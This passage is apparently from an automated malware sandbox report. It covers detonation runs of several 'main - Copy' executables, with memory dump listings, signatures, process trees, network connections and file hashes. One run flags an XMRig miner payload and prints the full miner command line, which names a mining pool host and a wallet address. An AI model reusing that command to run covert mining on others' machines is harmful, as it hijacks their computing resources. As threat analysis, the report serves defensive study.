memory/3564-61-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-62-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-63-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-64-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-65-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-66-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-67-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-68-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-69-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-70-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-71-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-72-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-73-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-74-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-75-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-76-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-77-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-78-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-79-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-80-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-81-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-82-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:10
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4864 wrote to memory of 1872 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4864 wrote to memory of 1872 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.125.209.23.in-addr.arpa | udp |
| BE | 2.17.107.131:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 131.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1872-14-0x0000015850360000-0x0000015850380000-memory.dmp
memory/1872-15-0x00000158E2720000-0x00000158E2740000-memory.dmp
memory/1872-16-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-17-0x00000158E2D90000-0x00000158E2DB0000-memory.dmp
memory/1872-18-0x00000158E2D70000-0x00000158E2D90000-memory.dmp
memory/1872-19-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-20-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-23-0x00000158E2D70000-0x00000158E2D90000-memory.dmp
memory/1872-22-0x00000158E2D90000-0x00000158E2DB0000-memory.dmp
memory/1872-21-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-24-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-25-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-26-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-27-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-28-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-29-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-30-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-31-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-32-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-33-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-34-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-35-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-36-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-37-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-38-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-39-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-40-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-41-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-42-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-43-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-44-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-45-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-46-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-47-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-48-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-49-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-50-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-51-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-52-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-53-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-54-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-55-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-56-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-57-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-58-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-59-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-60-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-61-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-62-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-63-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-64-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-65-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-66-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-67-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-68-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-69-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-70-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-71-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-72-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-73-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-74-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-75-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-76-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-77-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-78-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-79-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-80-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-81-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
memory/1872-82-0x00007FF6FA420000-0x00007FF6FAF23000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:12
Platform
win10v2004-20240508-en
Max time kernel
1709s
Max time network
1722s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:14
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:16
Platform
win10v2004-20240508-en
Max time kernel
1642s
Max time network
1655s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |